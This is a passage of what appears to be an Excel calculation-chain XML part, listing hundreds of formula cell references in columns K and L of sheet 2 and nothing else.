  <c r="K1045" i="2"/>
  <c r="L716" i="2"/>
  <c r="K716" i="2"/>
  <c r="L1454" i="2"/>
  <c r="K1454" i="2"/>
  <c r="L715" i="2"/>
  <c r="K715" i="2"/>
  <c r="L404" i="2"/>
  <c r="K404" i="2"/>
  <c r="L55" i="2"/>
  <c r="K55" i="2"/>
  <c r="L1406" i="2"/>
  <c r="K1406" i="2"/>
  <c r="L542" i="2"/>
  <c r="K542" i="2"/>
  <c r="L541" i="2"/>
  <c r="K541" i="2"/>
  <c r="L540" i="2"/>
  <c r="K540" i="2"/>
  <c r="L539" i="2"/>
  <c r="K539" i="2"/>
  <c r="L538" i="2"/>
  <c r="K538" i="2"/>
  <c r="L112" i="2"/>
  <c r="K112" i="2"/>
  <c r="L111" i="2"/>
  <c r="K111" i="2"/>
  <c r="L110" i="2"/>
  <c r="K110" i="2"/>
  <c r="L109" i="2"/>
  <c r="K109" i="2"/>
  <c r="L108" i="2"/>
  <c r="K108" i="2"/>
  <c r="L107" i="2"/>
  <c r="K107" i="2"/>
  <c r="L204" i="2"/>
  <c r="K204" i="2"/>
  <c r="L203" i="2"/>
  <c r="K203" i="2"/>
  <c r="L202" i="2"/>
  <c r="K202" i="2"/>
  <c r="L201" i="2"/>
  <c r="K201" i="2"/>
  <c r="L200" i="2"/>
  <c r="K200" i="2"/>
  <c r="L199" i="2"/>
  <c r="K199" i="2"/>
  <c r="L198" i="2"/>
  <c r="K198" i="2"/>
  <c r="L197" i="2"/>
  <c r="K197" i="2"/>
  <c r="L343" i="2"/>
  <c r="K343" i="2"/>
  <c r="L1114" i="2"/>
  <c r="K1114" i="2"/>
  <c r="L1113" i="2"/>
  <c r="K1113" i="2"/>
  <c r="L1112" i="2"/>
  <c r="K1112" i="2"/>
  <c r="L1868" i="2"/>
  <c r="K1868" i="2"/>
  <c r="L1867" i="2"/>
  <c r="K1867" i="2"/>
  <c r="L54" i="2"/>
  <c r="K54" i="2"/>
  <c r="L1061" i="2"/>
  <c r="K1061" i="2"/>
  <c r="L1533" i="2"/>
  <c r="K1533" i="2"/>
  <c r="L1532" i="2"/>
  <c r="K1532" i="2"/>
  <c r="L1531" i="2"/>
  <c r="K1531" i="2"/>
  <c r="L521" i="2"/>
  <c r="K521" i="2"/>
  <c r="L503" i="2"/>
  <c r="K503" i="2"/>
  <c r="L502" i="2"/>
  <c r="K502" i="2"/>
  <c r="L1158" i="2"/>
  <c r="K1158" i="2"/>
  <c r="L1485" i="2"/>
  <c r="K1485" i="2"/>
  <c r="L1099" i="2"/>
  <c r="K1099" i="2"/>
  <c r="L751" i="2"/>
  <c r="K751" i="2"/>
  <c r="L222" i="2"/>
  <c r="K222" i="2"/>
  <c r="L221" i="2"/>
  <c r="K221" i="2"/>
  <c r="L1281" i="2"/>
  <c r="K1281" i="2"/>
  <c r="L852" i="2"/>
  <c r="K852" i="2"/>
  <c r="L851" i="2"/>
  <c r="K851" i="2"/>
  <c r="L850" i="2"/>
  <c r="K850" i="2"/>
  <c r="L849" i="2"/>
  <c r="K849" i="2"/>
  <c r="L848" i="2"/>
  <c r="K848" i="2"/>
  <c r="L143" i="2"/>
  <c r="K143" i="2"/>
  <c r="L144" i="2"/>
  <c r="K144" i="2"/>
  <c r="L185" i="2"/>
  <c r="K185" i="2"/>
  <c r="L210" i="2"/>
  <c r="K210" i="2"/>
  <c r="L44" i="2"/>
  <c r="K44" i="2"/>
  <c r="L43" i="2"/>
  <c r="K43" i="2"/>
  <c r="L42" i="2"/>
  <c r="K42" i="2"/>
  <c r="L1484" i="2"/>
  <c r="K1484" i="2"/>
  <c r="L315" i="2"/>
  <c r="K315" i="2"/>
  <c r="L1417" i="2"/>
  <c r="K1417" i="2"/>
  <c r="L1866" i="2"/>
  <c r="K1866" i="2"/>
  <c r="L907" i="2"/>
  <c r="K907" i="2"/>
  <c r="L681" i="2"/>
  <c r="K681" i="2"/>
  <c r="L926" i="2"/>
  <c r="K926" i="2"/>
  <c r="L925" i="2"/>
  <c r="K925" i="2"/>
  <c r="L140" i="2"/>
  <c r="K140" i="2"/>
  <c r="L139" i="2"/>
  <c r="K139" i="2"/>
  <c r="L138" i="2"/>
  <c r="K138" i="2"/>
  <c r="L847" i="2"/>
  <c r="K847" i="2"/>
  <c r="L939" i="2"/>
  <c r="K939" i="2"/>
  <c r="L520" i="2"/>
  <c r="K520" i="2"/>
  <c r="L519" i="2"/>
  <c r="K519" i="2"/>
  <c r="L518" i="2"/>
  <c r="K518" i="2"/>
  <c r="L517" i="2"/>
  <c r="K517" i="2"/>
  <c r="L516" i="2"/>
  <c r="K516" i="2"/>
  <c r="L515" i="2"/>
  <c r="K515" i="2"/>
  <c r="L514" i="2"/>
  <c r="K514" i="2"/>
  <c r="L513" i="2"/>
  <c r="K513" i="2"/>
  <c r="L236" i="2"/>
  <c r="K236" i="2"/>
  <c r="L799" i="2"/>
  <c r="K799" i="2"/>
  <c r="L683" i="2"/>
  <c r="K683" i="2"/>
  <c r="L846" i="2"/>
  <c r="K846" i="2"/>
  <c r="L1005" i="2"/>
  <c r="K1005" i="2"/>
  <c r="L441" i="2"/>
  <c r="K441" i="2"/>
  <c r="L440" i="2"/>
  <c r="K440" i="2"/>
  <c r="L439" i="2"/>
  <c r="K439" i="2"/>
  <c r="L537" i="2"/>
  <c r="K537" i="2"/>
  <c r="L658" i="2"/>
  <c r="K658" i="2"/>
  <c r="L571" i="2"/>
  <c r="K571" i="2"/>
  <c r="L938" i="2"/>
  <c r="K938" i="2"/>
  <c r="L631" i="2"/>
  <c r="K631" i="2"/>
  <c r="L845" i="2"/>
  <c r="K845" i="2"/>
  <c r="L844" i="2"/>
  <c r="K844" i="2"/>
  <c r="L1244" i="2"/>
  <c r="K1244" i="2"/>
  <c r="L326" i="2"/>
  <c r="K326" i="2"/>
  <c r="L1407" i="2"/>
  <c r="K1407"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804" i="2"/>
  <c r="K804" i="2"/>
  <c r="L1483" i="2"/>
  <c r="K1483" i="2"/>
  <c r="L1865" i="2"/>
  <c r="K1865" i="2"/>
  <c r="L1864" i="2"/>
  <c r="K1864" i="2"/>
  <c r="L1863" i="2"/>
  <c r="K1863" i="2"/>
  <c r="L1862" i="2"/>
  <c r="K1862" i="2"/>
  <c r="L1482" i="2"/>
  <c r="K1482" i="2"/>
  <c r="L103" i="2"/>
  <c r="K103" i="2"/>
  <c r="L94" i="2"/>
  <c r="K94" i="2"/>
  <c r="L93" i="2"/>
  <c r="K93" i="2"/>
  <c r="L92" i="2"/>
  <c r="K92" i="2"/>
  <c r="L102" i="2"/>
  <c r="K102" i="2"/>
  <c r="L561" i="2"/>
  <c r="K561" i="2"/>
  <c r="L727" i="2"/>
  <c r="K727" i="2"/>
  <c r="L388" i="2"/>
  <c r="K388" i="2"/>
  <c r="L536" i="2"/>
  <c r="K536" i="2"/>
  <c r="L231" i="2"/>
  <c r="K231" i="2"/>
  <c r="L323" i="2"/>
  <c r="K323" i="2"/>
  <c r="L13" i="2"/>
  <c r="K13" i="2"/>
  <c r="L11" i="2"/>
  <c r="K11" i="2"/>
  <c r="L105" i="2"/>
  <c r="K105" i="2"/>
  <c r="L1220" i="2"/>
  <c r="K1220" i="2"/>
  <c r="L1219" i="2"/>
  <c r="K1219" i="2"/>
  <c r="L635" i="2"/>
  <c r="K635" i="2"/>
  <c r="L220" i="2"/>
  <c r="K220" i="2"/>
  <c r="L224" i="2"/>
  <c r="K224" i="2"/>
  <c r="L219" i="2"/>
  <c r="K219" i="2"/>
  <c r="L218" i="2"/>
  <c r="K218" i="2"/>
  <c r="L1218" i="2"/>
  <c r="K1218" i="2"/>
  <c r="L1004" i="2"/>
  <c r="K1004" i="2"/>
  <c r="L1003" i="2"/>
  <c r="K1003" i="2"/>
  <c r="L1002" i="2"/>
  <c r="K1002" i="2"/>
  <c r="L1001" i="2"/>
  <c r="K1001" i="2"/>
  <c r="L384" i="2"/>
  <c r="K384" i="2"/>
  <c r="L1111" i="2"/>
  <c r="K1111" i="2"/>
  <c r="L1110" i="2"/>
  <c r="K1110" i="2"/>
  <c r="L452" i="2"/>
  <c r="K452" i="2"/>
  <c r="L823" i="2"/>
  <c r="K823" i="2"/>
  <c r="L822" i="2"/>
  <c r="K822" i="2"/>
  <c r="L1254" i="2"/>
  <c r="K1254" i="2"/>
  <c r="L1267" i="2"/>
  <c r="K1267" i="2"/>
  <c r="L1157" i="2"/>
  <c r="K1157" i="2"/>
  <c r="L1481" i="2"/>
  <c r="K1481" i="2"/>
  <c r="L1480" i="2"/>
  <c r="K1480" i="2"/>
  <c r="L1479" i="2"/>
  <c r="K1479" i="2"/>
  <c r="L438" i="2"/>
  <c r="K438" i="2"/>
  <c r="L437" i="2"/>
  <c r="K437" i="2"/>
  <c r="L562" i="2"/>
  <c r="K562" i="2"/>
  <c r="L647" i="2"/>
  <c r="K647" i="2"/>
  <c r="L1530" i="2"/>
  <c r="K1530" i="2"/>
  <c r="L1529" i="2"/>
  <c r="K1529" i="2"/>
  <c r="L1278" i="2"/>
  <c r="K1278" i="2"/>
  <c r="L1416" i="2"/>
  <c r="K1416" i="2"/>
  <c r="L920" i="2"/>
  <c r="K920" i="2"/>
  <c r="L958" i="2"/>
  <c r="K958" i="2"/>
  <c r="L1861" i="2"/>
  <c r="K1861" i="2"/>
  <c r="L1860" i="2"/>
  <c r="K1860" i="2"/>
  <c r="L1520" i="2"/>
  <c r="K1520" i="2"/>
  <c r="L1519" i="2"/>
  <c r="K1519" i="2"/>
  <c r="L1265" i="2"/>
  <c r="K1265" i="2"/>
  <c r="L1555" i="2"/>
  <c r="K1555" i="2"/>
  <c r="L1859" i="2"/>
  <c r="K1859" i="2"/>
  <c r="L905" i="2"/>
  <c r="K905" i="2"/>
  <c r="L904" i="2"/>
  <c r="K904" i="2"/>
  <c r="L903" i="2"/>
  <c r="K903" i="2"/>
  <c r="L902" i="2"/>
  <c r="K902" i="2"/>
  <c r="L901" i="2"/>
  <c r="K901" i="2"/>
  <c r="L80" i="2"/>
  <c r="K80" i="2"/>
  <c r="L79" i="2"/>
  <c r="K79" i="2"/>
  <c r="L82" i="2"/>
  <c r="K82" i="2"/>
  <c r="L84" i="2"/>
  <c r="K84" i="2"/>
  <c r="L83" i="2"/>
  <c r="K83" i="2"/>
  <c r="L71" i="2"/>
  <c r="K71" i="2"/>
  <c r="L78" i="2"/>
  <c r="K78" i="2"/>
  <c r="L70" i="2"/>
  <c r="K70" i="2"/>
  <c r="L99" i="2"/>
  <c r="K99" i="2"/>
  <c r="L69" i="2"/>
  <c r="K69" i="2"/>
  <c r="L1156" i="2"/>
  <c r="K1156" i="2"/>
  <c r="L827" i="2"/>
  <c r="K827" i="2"/>
  <c r="L1043" i="2"/>
  <c r="K1043" i="2"/>
  <c r="L535" i="2"/>
  <c r="K535" i="2"/>
  <c r="L428" i="2"/>
  <c r="K428" i="2"/>
  <c r="L1155" i="2"/>
  <c r="K1155" i="2"/>
  <c r="L821" i="2"/>
  <c r="K821" i="2"/>
  <c r="L1154" i="2"/>
  <c r="K1154" i="2"/>
  <c r="L820" i="2"/>
  <c r="K820" i="2"/>
  <c r="L1153" i="2"/>
  <c r="K1153" i="2"/>
  <c r="L498" i="2"/>
  <c r="K498" i="2"/>
  <c r="L456" i="2"/>
  <c r="K456" i="2"/>
  <c r="L567" i="2"/>
  <c r="K567" i="2"/>
  <c r="L427" i="2"/>
  <c r="K427" i="2"/>
  <c r="L493" i="2"/>
  <c r="K493" i="2"/>
  <c r="L1554" i="2"/>
  <c r="K1554" i="2"/>
  <c r="L335" i="2"/>
  <c r="K335" i="2"/>
  <c r="L334" i="2"/>
  <c r="K334" i="2"/>
  <c r="L333" i="2"/>
  <c r="K333" i="2"/>
  <c r="L726" i="2"/>
  <c r="K726" i="2"/>
  <c r="L919" i="2"/>
  <c r="K919" i="2"/>
  <c r="L725" i="2"/>
  <c r="K725" i="2"/>
  <c r="L612" i="2"/>
  <c r="K612" i="2"/>
  <c r="L611" i="2"/>
  <c r="K611" i="2"/>
  <c r="L610" i="2"/>
  <c r="K610" i="2"/>
  <c r="L609" i="2"/>
  <c r="K609" i="2"/>
  <c r="L1152" i="2"/>
  <c r="K1152" i="2"/>
  <c r="L1424" i="2"/>
  <c r="K1424" i="2"/>
  <c r="L1423" i="2"/>
  <c r="K1423" i="2"/>
  <c r="L1422" i="2"/>
  <c r="K1422" i="2"/>
  <c r="L1421" i="2"/>
  <c r="K1421" i="2"/>
  <c r="L100" i="2"/>
  <c r="K100" i="2"/>
  <c r="L77" i="2"/>
  <c r="K77" i="2"/>
  <c r="L76" i="2"/>
  <c r="K76" i="2"/>
  <c r="L81" i="2"/>
  <c r="K81" i="2"/>
  <c r="L75" i="2"/>
  <c r="K75" i="2"/>
  <c r="L68" i="2"/>
  <c r="K68" i="2"/>
  <c r="L74" i="2"/>
  <c r="K74" i="2"/>
  <c r="L67" i="2"/>
  <c r="K67" i="2"/>
  <c r="L73" i="2"/>
  <c r="K73" i="2"/>
  <c r="L72" i="2"/>
  <c r="K72" i="2"/>
  <c r="L106" i="2"/>
  <c r="K106" i="2"/>
  <c r="L1151" i="2"/>
  <c r="K1151" i="2"/>
  <c r="L403" i="2"/>
  <c r="K403" i="2"/>
  <c r="L189" i="2"/>
  <c r="K189" i="2"/>
  <c r="L1150" i="2"/>
  <c r="K1150" i="2"/>
  <c r="L455" i="2"/>
  <c r="K455" i="2"/>
  <c r="L186" i="2"/>
  <c r="K186" i="2"/>
  <c r="L454" i="2"/>
  <c r="K454" i="2"/>
  <c r="L453" i="2"/>
  <c r="K453" i="2"/>
  <c r="L374" i="2"/>
  <c r="K374" i="2"/>
  <c r="L373" i="2"/>
  <c r="K373" i="2"/>
  <c r="L778" i="2"/>
  <c r="K778" i="2"/>
  <c r="L118" i="2"/>
  <c r="K118" i="2"/>
  <c r="L117" i="2"/>
  <c r="K117" i="2"/>
  <c r="L1858" i="2"/>
  <c r="K1858" i="2"/>
  <c r="L239" i="2"/>
  <c r="K239" i="2"/>
  <c r="L589" i="2"/>
  <c r="K589" i="2"/>
  <c r="L641" i="2"/>
  <c r="K641" i="2"/>
  <c r="L238" i="2"/>
  <c r="K238" i="2"/>
  <c r="L640" i="2"/>
  <c r="K640" i="2"/>
  <c r="L245" i="2"/>
  <c r="K245" i="2"/>
  <c r="L244" i="2"/>
  <c r="K244" i="2"/>
  <c r="L322" i="2"/>
  <c r="K322" i="2"/>
  <c r="L392" i="2"/>
  <c r="K392" i="2"/>
  <c r="L390" i="2"/>
  <c r="K390" i="2"/>
  <c r="L391" i="2"/>
  <c r="K391" i="2"/>
  <c r="L393" i="2"/>
  <c r="K393" i="2"/>
  <c r="L711" i="2"/>
  <c r="K711" i="2"/>
  <c r="L706" i="2"/>
  <c r="K706" i="2"/>
  <c r="L646" i="2"/>
  <c r="K646" i="2"/>
  <c r="L645" i="2"/>
  <c r="K645" i="2"/>
  <c r="L644" i="2"/>
  <c r="K644" i="2"/>
  <c r="L531" i="2"/>
  <c r="K531" i="2"/>
  <c r="L1857" i="2"/>
  <c r="K1857" i="2"/>
  <c r="L1856" i="2"/>
  <c r="K1856" i="2"/>
  <c r="L719" i="2"/>
  <c r="K719" i="2"/>
  <c r="L724" i="2"/>
  <c r="K724" i="2"/>
  <c r="L723" i="2"/>
  <c r="K723" i="2"/>
  <c r="L722" i="2"/>
  <c r="K722" i="2"/>
  <c r="L721" i="2"/>
  <c r="K721" i="2"/>
  <c r="L534" i="2"/>
  <c r="K534" i="2"/>
  <c r="L718" i="2"/>
  <c r="K718" i="2"/>
  <c r="L717" i="2"/>
  <c r="K717" i="2"/>
  <c r="L924" i="2"/>
  <c r="K924" i="2"/>
  <c r="L1149" i="2"/>
  <c r="K1149" i="2"/>
  <c r="L1148" i="2"/>
  <c r="K1148" i="2"/>
  <c r="L608" i="2"/>
  <c r="K608" i="2"/>
  <c r="L607" i="2"/>
  <c r="K607" i="2"/>
  <c r="L1249" i="2"/>
  <c r="K1249" i="2"/>
  <c r="L828" i="2"/>
  <c r="K828" i="2"/>
  <c r="L1225" i="2"/>
  <c r="K1225" i="2"/>
  <c r="L1223" i="2"/>
  <c r="K1223" i="2"/>
  <c r="L1221" i="2"/>
  <c r="K1221" i="2"/>
  <c r="L1222" i="2"/>
  <c r="K1222" i="2"/>
  <c r="L1032" i="2"/>
  <c r="K1032" i="2"/>
  <c r="L1042" i="2"/>
  <c r="K1042" i="2"/>
  <c r="L1217" i="2"/>
  <c r="K1217" i="2"/>
  <c r="L1062" i="2"/>
  <c r="K1062" i="2"/>
  <c r="L1030" i="2"/>
  <c r="K1030" i="2"/>
  <c r="L918" i="2"/>
  <c r="K918" i="2"/>
  <c r="L387" i="2"/>
  <c r="K387" i="2"/>
  <c r="L917" i="2"/>
  <c r="K917" i="2"/>
  <c r="L1277" i="2"/>
  <c r="K1277" i="2"/>
  <c r="L880" i="2"/>
  <c r="K880" i="2"/>
  <c r="L1269" i="2"/>
  <c r="K1269" i="2"/>
  <c r="L1080" i="2"/>
  <c r="K1080" i="2"/>
  <c r="L1079" i="2"/>
  <c r="K1079" i="2"/>
  <c r="L1078" i="2"/>
  <c r="K1078" i="2"/>
  <c r="L1077" i="2"/>
  <c r="K1077" i="2"/>
  <c r="L1076" i="2"/>
  <c r="K1076" i="2"/>
  <c r="L1855" i="2"/>
  <c r="K1855" i="2"/>
  <c r="L319" i="2"/>
  <c r="K319" i="2"/>
  <c r="L1237" i="2"/>
  <c r="K1237" i="2"/>
  <c r="L1260" i="2"/>
  <c r="K1260" i="2"/>
  <c r="L1259" i="2"/>
  <c r="K1259" i="2"/>
  <c r="L1854" i="2"/>
  <c r="K1854" i="2"/>
  <c r="L1853" i="2"/>
  <c r="K1853" i="2"/>
  <c r="L1852" i="2"/>
  <c r="K1852" i="2"/>
  <c r="L1851" i="2"/>
  <c r="K1851" i="2"/>
  <c r="L1478" i="2"/>
  <c r="K1478" i="2"/>
  <c r="L1477" i="2"/>
  <c r="K1477" i="2"/>
  <c r="L1252" i="2"/>
  <c r="K1252" i="2"/>
  <c r="L533" i="2"/>
  <c r="K533" i="2"/>
  <c r="L532" i="2"/>
  <c r="K532" i="2"/>
  <c r="L1246" i="2"/>
  <c r="K1246" i="2"/>
  <c r="L1245" i="2"/>
  <c r="K1245" i="2"/>
  <c r="L1251" i="2"/>
  <c r="K1251" i="2"/>
  <c r="L1147" i="2"/>
  <c r="K1147" i="2"/>
  <c r="L497" i="2"/>
  <c r="K497" i="2"/>
  <c r="L496" i="2"/>
  <c r="K496" i="2"/>
  <c r="L495" i="2"/>
  <c r="K495" i="2"/>
  <c r="L494" i="2"/>
  <c r="K494" i="2"/>
  <c r="L1400" i="2"/>
  <c r="K1400" i="2"/>
  <c r="L1399" i="2"/>
  <c r="K1399" i="2"/>
  <c r="L1398" i="2"/>
  <c r="K1398" i="2"/>
  <c r="L1031" i="2"/>
  <c r="K1031" i="2"/>
  <c r="L1037" i="2"/>
  <c r="K1037" i="2"/>
  <c r="L843" i="2"/>
  <c r="K843" i="2"/>
  <c r="L590" i="2"/>
  <c r="K590" i="2"/>
  <c r="L694" i="2"/>
  <c r="K694" i="2"/>
  <c r="L697" i="2"/>
  <c r="K697" i="2"/>
  <c r="L842" i="2"/>
  <c r="K842" i="2"/>
  <c r="L1350" i="2"/>
  <c r="K1350" i="2"/>
  <c r="L1335" i="2"/>
  <c r="K1335" i="2"/>
  <c r="L1349" i="2"/>
  <c r="K1349" i="2"/>
  <c r="L1348" i="2"/>
  <c r="K1348" i="2"/>
  <c r="L1047" i="2"/>
  <c r="K1047" i="2"/>
  <c r="L1285" i="2"/>
  <c r="K1285" i="2"/>
  <c r="L159" i="2"/>
  <c r="K159" i="2"/>
  <c r="L188" i="2"/>
  <c r="K188" i="2"/>
  <c r="L1462" i="2"/>
  <c r="K1462" i="2"/>
  <c r="L1461" i="2"/>
  <c r="K1461" i="2"/>
  <c r="L1460" i="2"/>
  <c r="K1460" i="2"/>
  <c r="L91" i="2"/>
  <c r="K91" i="2"/>
  <c r="L587" i="2"/>
  <c r="K587" i="2"/>
  <c r="L242" i="2"/>
  <c r="K242" i="2"/>
  <c r="L382" i="2"/>
  <c r="K382" i="2"/>
  <c r="L241" i="2"/>
  <c r="K241" i="2"/>
  <c r="L586" i="2"/>
  <c r="K586" i="2"/>
  <c r="L1284" i="2"/>
  <c r="K1284" i="2"/>
  <c r="L1229" i="2"/>
  <c r="K1229" i="2"/>
  <c r="L1098" i="2"/>
  <c r="K1098" i="2"/>
  <c r="L957" i="2"/>
  <c r="K957" i="2"/>
  <c r="L1521" i="2"/>
  <c r="K1521" i="2"/>
  <c r="L1390" i="2"/>
  <c r="K1390" i="2"/>
  <c r="L1389" i="2"/>
  <c r="K1389" i="2"/>
  <c r="L1415" i="2"/>
  <c r="K1415" i="2"/>
  <c r="L881" i="2"/>
  <c r="K881" i="2"/>
  <c r="L691" i="2"/>
  <c r="K691" i="2"/>
  <c r="L1109" i="2"/>
  <c r="K1109" i="2"/>
  <c r="L1553" i="2"/>
  <c r="K1553" i="2"/>
  <c r="L101" i="2"/>
  <c r="K101" i="2"/>
  <c r="L485" i="2"/>
  <c r="K485" i="2"/>
  <c r="L123" i="2"/>
  <c r="K123" i="2"/>
  <c r="L122" i="2"/>
  <c r="K122" i="2"/>
  <c r="L121" i="2"/>
  <c r="K121" i="2"/>
  <c r="L1053" i="2"/>
  <c r="K1053" i="2"/>
  <c r="L1052" i="2"/>
  <c r="K1052" i="2"/>
  <c r="L705" i="2"/>
  <c r="K705" i="2"/>
  <c r="L704" i="2"/>
  <c r="K704" i="2"/>
  <c r="L703" i="2"/>
  <c r="K703" i="2"/>
  <c r="L702" i="2"/>
  <c r="K702" i="2"/>
  <c r="L701" i="2"/>
  <c r="K701" i="2"/>
  <c r="L342" i="2"/>
  <c r="K342" i="2"/>
  <c r="L341" i="2"/>
  <c r="K341" i="2"/>
  <c r="L675" i="2"/>
  <c r="K675" i="2"/>
  <c r="L674" i="2"/>
  <c r="K674" i="2"/>
  <c r="L1552" i="2"/>
  <c r="K1552" i="2"/>
  <c r="L569" i="2"/>
  <c r="K569" i="2"/>
  <c r="L568" i="2"/>
  <c r="K568" i="2"/>
  <c r="L1551" i="2"/>
  <c r="K1551" i="2"/>
  <c r="L841" i="2"/>
  <c r="K841" i="2"/>
  <c r="L65" i="2"/>
  <c r="K65" i="2"/>
  <c r="L508" i="2"/>
  <c r="K508" i="2"/>
  <c r="L1528" i="2"/>
  <c r="K1528" i="2"/>
  <c r="L1410" i="2"/>
  <c r="K1410" i="2"/>
  <c r="L1075" i="2"/>
  <c r="K1075" i="2"/>
  <c r="L1108" i="2"/>
  <c r="K1108" i="2"/>
  <c r="L1107" i="2"/>
  <c r="K1107" i="2"/>
  <c r="L53" i="2"/>
  <c r="K53" i="2"/>
  <c r="L52" i="2"/>
  <c r="K52" i="2"/>
  <c r="L1074" i="2"/>
  <c r="K1074" i="2"/>
  <c r="L555" i="2"/>
  <c r="K555" i="2"/>
  <c r="L1036" i="2"/>
  <c r="K1036" i="2"/>
  <c r="L916" i="2"/>
  <c r="K916" i="2"/>
  <c r="L327" i="2"/>
  <c r="K327" i="2"/>
  <c r="L585" i="2"/>
  <c r="K585" i="2"/>
  <c r="L9" i="2"/>
  <c r="K9" i="2"/>
  <c r="L789" i="2"/>
  <c r="K789" i="2"/>
  <c r="L570" i="2"/>
  <c r="K570" i="2"/>
  <c r="L1146" i="2"/>
  <c r="K1146" i="2"/>
  <c r="L1029" i="2"/>
  <c r="K1029" i="2"/>
  <c r="L253" i="2"/>
  <c r="K253" i="2"/>
  <c r="L524" i="2"/>
  <c r="K524" i="2"/>
  <c r="L523" i="2"/>
  <c r="K523" i="2"/>
  <c r="L915" i="2"/>
  <c r="K915" i="2"/>
  <c r="L900" i="2"/>
  <c r="K900" i="2"/>
  <c r="L1393" i="2"/>
  <c r="K1393" i="2"/>
  <c r="L840" i="2"/>
  <c r="K840" i="2"/>
  <c r="L839" i="2"/>
  <c r="K839" i="2"/>
  <c r="L1397" i="2"/>
  <c r="K1397" i="2"/>
  <c r="L673" i="2"/>
  <c r="K673" i="2"/>
  <c r="L672" i="2"/>
  <c r="K672" i="2"/>
  <c r="L671" i="2"/>
  <c r="K671" i="2"/>
  <c r="L670" i="2"/>
  <c r="K670" i="2"/>
  <c r="L669" i="2"/>
  <c r="K669" i="2"/>
  <c r="L668" i="2"/>
  <c r="K668" i="2"/>
  <c r="L667" i="2"/>
  <c r="K667" i="2"/>
  <c r="L666" i="2"/>
  <c r="K666" i="2"/>
  <c r="L665" i="2"/>
  <c r="K665" i="2"/>
  <c r="L386" i="2"/>
  <c r="K386" i="2"/>
  <c r="L618" i="2"/>
  <c r="K618" i="2"/>
  <c r="L624" i="2"/>
  <c r="K624" i="2"/>
  <c r="L623" i="2"/>
  <c r="K623" i="2"/>
  <c r="L622" i="2"/>
  <c r="K622" i="2"/>
  <c r="L621" i="2"/>
  <c r="K621" i="2"/>
  <c r="L1396" i="2"/>
  <c r="K1396" i="2"/>
  <c r="L1575" i="2"/>
  <c r="K1575" i="2"/>
  <c r="L1850" i="2"/>
  <c r="K1850" i="2"/>
  <c r="L1226" i="2"/>
  <c r="K1226" i="2"/>
  <c r="L1227" i="2"/>
  <c r="K1227" i="2"/>
  <c r="L1228" i="2"/>
  <c r="K1228" i="2"/>
  <c r="L1073" i="2"/>
  <c r="K1073" i="2"/>
  <c r="L1072" i="2"/>
  <c r="K1072" i="2"/>
  <c r="L1071" i="2"/>
  <c r="K1071" i="2"/>
  <c r="L1070" i="2"/>
  <c r="K1070" i="2"/>
  <c r="L385" i="2"/>
  <c r="K385" i="2"/>
  <c r="L657" i="2"/>
  <c r="K657" i="2"/>
  <c r="L511" i="2"/>
  <c r="K511" i="2"/>
  <c r="L510" i="2"/>
  <c r="K510" i="2"/>
  <c r="L416" i="2"/>
  <c r="K416" i="2"/>
  <c r="L584" i="2"/>
  <c r="K584" i="2"/>
  <c r="L696" i="2"/>
  <c r="K696" i="2"/>
  <c r="L1409" i="2"/>
  <c r="K1409" i="2"/>
  <c r="L1433" i="2"/>
  <c r="K1433" i="2"/>
  <c r="L1432" i="2"/>
  <c r="K1432" i="2"/>
  <c r="L1431" i="2"/>
  <c r="K1431" i="2"/>
  <c r="L1430" i="2"/>
  <c r="K1430" i="2"/>
  <c r="L639" i="2"/>
  <c r="K639" i="2"/>
  <c r="L580" i="2"/>
  <c r="K580" i="2"/>
  <c r="L762" i="2"/>
  <c r="K762" i="2"/>
  <c r="L761" i="2"/>
  <c r="K761" i="2"/>
  <c r="L760" i="2"/>
  <c r="K760" i="2"/>
  <c r="L759" i="2"/>
  <c r="K759" i="2"/>
  <c r="L758" i="2"/>
  <c r="K758" i="2"/>
  <c r="L757" i="2"/>
  <c r="K757" i="2"/>
  <c r="L693" i="2"/>
  <c r="K693" i="2"/>
  <c r="L692" i="2"/>
  <c r="K692" i="2"/>
  <c r="L1145" i="2"/>
  <c r="K1145" i="2"/>
  <c r="L1144" i="2"/>
  <c r="K1144" i="2"/>
  <c r="L1338" i="2"/>
  <c r="K1338" i="2"/>
  <c r="L1280" i="2"/>
  <c r="K1280" i="2"/>
  <c r="L1388" i="2"/>
  <c r="K1388" i="2"/>
  <c r="L1337" i="2"/>
  <c r="K1337" i="2"/>
  <c r="L402" i="2"/>
  <c r="K402" i="2"/>
  <c r="L401" i="2"/>
  <c r="K401" i="2"/>
  <c r="L1849" i="2"/>
  <c r="K1849" i="2"/>
  <c r="L838" i="2"/>
  <c r="K838" i="2"/>
  <c r="L181" i="2"/>
  <c r="K181" i="2"/>
  <c r="L1458" i="2"/>
  <c r="K1458" i="2"/>
  <c r="L1143" i="2"/>
  <c r="K1143" i="2"/>
  <c r="L249" i="2"/>
  <c r="K249" i="2"/>
  <c r="L250" i="2"/>
  <c r="K250" i="2"/>
  <c r="L1330" i="2"/>
  <c r="K1330" i="2"/>
  <c r="L1275" i="2"/>
  <c r="K1275" i="2"/>
  <c r="L205" i="2"/>
  <c r="K205" i="2"/>
  <c r="L206" i="2"/>
  <c r="K206" i="2"/>
  <c r="L251" i="2"/>
  <c r="K251" i="2"/>
  <c r="L709" i="2"/>
  <c r="K709" i="2"/>
  <c r="L708" i="2"/>
  <c r="K708" i="2"/>
  <c r="L707" i="2"/>
  <c r="K707" i="2"/>
  <c r="L1848" i="2"/>
  <c r="K1848" i="2"/>
  <c r="L1847" i="2"/>
  <c r="K1847" i="2"/>
  <c r="L913" i="2"/>
  <c r="K913"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24" i="2"/>
  <c r="K24" i="2"/>
  <c r="L23" i="2"/>
  <c r="K23" i="2"/>
  <c r="L45" i="2"/>
  <c r="K45" i="2"/>
  <c r="L1829" i="2"/>
  <c r="K1829" i="2"/>
  <c r="L1828" i="2"/>
  <c r="K1828" i="2"/>
  <c r="L1827" i="2"/>
  <c r="K1827" i="2"/>
  <c r="L620" i="2"/>
  <c r="K620" i="2"/>
  <c r="L1826" i="2"/>
  <c r="K1826" i="2"/>
  <c r="L1825" i="2"/>
  <c r="K1825" i="2"/>
  <c r="L1106" i="2"/>
  <c r="K1106" i="2"/>
  <c r="L619" i="2"/>
  <c r="K619" i="2"/>
  <c r="L1824" i="2"/>
  <c r="K1824" i="2"/>
  <c r="L756" i="2"/>
  <c r="K756" i="2"/>
  <c r="L755" i="2"/>
  <c r="K755" i="2"/>
  <c r="L1823" i="2"/>
  <c r="K1823" i="2"/>
  <c r="L1822" i="2"/>
  <c r="K1822" i="2"/>
  <c r="L1476" i="2"/>
  <c r="K1476" i="2"/>
  <c r="L1821" i="2"/>
  <c r="K1821" i="2"/>
  <c r="L1820" i="2"/>
  <c r="K1820" i="2"/>
